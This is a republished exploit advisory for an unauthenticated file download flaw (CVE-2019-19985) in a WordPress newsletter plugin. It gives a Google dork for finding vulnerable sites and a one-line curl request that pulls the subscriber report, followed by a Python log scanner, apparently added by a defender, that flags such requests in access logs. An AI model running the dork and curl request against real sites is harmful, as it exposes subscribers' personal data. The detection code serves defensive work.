
Published on July 26th, 2020


WordPress Plugin Email Subscribers & Newsletters 4.2.2 – Unauthenticated File Download



# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985

# EXPLOIT: Email Subscribers & Newsletters <= 4.2.2, Unauthenticated File Download (KBAZ)


curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
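
A log check for the request shown above, added here as a defender's example and not part of the original advisory: it scans web server access logs for requests to admin.php with page=download_report and marks the ones that were answered with a body. It assumes Combined Log Format; the function names are hypothetical and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return a finding dict for a download_report request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs percent-decodes, so page=download%5Freport matches as well,
    # and parameter order does not matter.
    params = {k.lower(): v[-1] for k, v in parse_qs(url.query).items()}
    if not url.path.lower().endswith("/wp-admin/admin.php"):
        return None
    if params.get("page", "").lower() != "download_report":
        return None
    size = 0 if m["size"] == "-" else int(m["size"])
    # 200 with a body: the report was served. WordPress normally answers an
    # unauthenticated /wp-admin request with a 302 to the login page.
    served = m["status"] == "200" and size > 0
    return {"ip": m["ip"], "time": m["time"], "status": int(m["status"]),
            "bytes": size, "report": params.get("report", ""), "served": served}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (not real traffic)
SAMPLE = [
    '203.0.113.7 - - [26/Jul/2020:10:01:02 +0000] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 200 48213 "-" "curl/7.68.0"',
    '203.0.113.7 - - [26/Jul/2020:10:01:09 +0000] "GET /blog/wp-admin/admin.php?status=all&report=users&page=download%5Freport HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '198.51.100.4 - - [26/Jul/2020:10:02:00 +0000] "GET /wp-admin/admin.php?page=example_page HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Jul/2020:10:03:00 +0000] "GET /index.php?page=download_report HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The access log does not record session cookies, so a served hit still has to be matched against known administrator activity before it is treated as an unauthenticated export.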
            




